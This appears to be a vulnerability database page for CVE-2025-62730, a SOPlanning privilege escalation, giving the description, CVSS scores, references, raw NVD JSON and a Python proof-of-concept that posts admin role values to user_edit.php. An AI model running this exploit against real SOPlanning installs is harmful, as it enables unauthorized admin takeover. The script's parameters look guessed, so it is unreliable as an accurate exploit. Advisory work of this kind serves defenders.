CVE-2025-62730

Description

SOPlanning is vulnerable to Privilege Escalation in user management tab. Users with user_manage_team role are allowed to modify permissions of users. However, they are able to assign administrative permissions to any user including themselves. This allow a malicious authenticated attacker with this role to escalate to admin privileges. This issue affects both Bulk Update functionality and regular edition of user's right and privileges. This issue was fixed in version 1.55.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* - VULNERABLE

SOPlanning < 1.55

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-62730 SOPlanning Privilege Escalation PoC Target: SOPlanning <= 1.54 Author: [email protected] """ import requests import sys from bs4 import BeautifulSoup TARGET = "http://target-soplanning.local" USERNAME = "attacker_user" PASSWORD = "password123" def exploit(): """Exploit privilege escalation vulnerability""" session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET}/login.php" login_data = { "login": USERNAME, "password": PASSWORD } resp = session.post(login_url, data=login_data) if "login" in resp.url.lower(): print("[-] Login failed") return False print("[+] Logged in successfully") # Step 2: Get user list to find target user ID users_url = f"{TARGET}/user_list.php" resp = session.get(users_url) # Step 3: Modify own permissions to become admin # Intercept the user edit request and modify role to 'admin' edit_url = f"{TARGET}/user_edit.php" exploit_data = { "id_user": "1", # Own user ID "role": "admin", # Escalate to admin "droits": "all", # All permissions "user_manage_team": "1", "submit": "1" } resp = session.post(edit_url, data=exploit_data) if resp.status_code == 200: print("[+] Privilege escalation successful!") print("[+] You now have admin privileges") return True print("[-] Exploitation failed") return False if __name__ == "__main__": exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62730
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62730
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62730/
[4] VulDB https://vuldb.com/cve/CVE-2025-62730
[5] https://cert.pl/en/posts/2025/11/CVE-2025-62293
[6] https://www.soplanning.org/en/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62730", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:16:00.180", "lastModified": "2025-11-24T13:53:07.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOPlanning is vulnerable to Privilege Escalation in user management tab. Users with user_manage_team role are allowed to modify permissions of users. However, they are able to assign administrative permissions to any user including themselves. This allow a malicious authenticated attacker with this role to escalate to admin privileges. This issue affects both Bulk Update functionality and regular edition of user's right and privileges.\n\nThis issue was fixed in version 1.55."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.55.00", "matchCriteriaId": "C84D5087-6ED4-47E4-9E68-F1881726E7D2"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/11/CVE-2025-62293", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.soplanning.org/en/", "source": "[email protected]", "tags": ["Product"]}]}}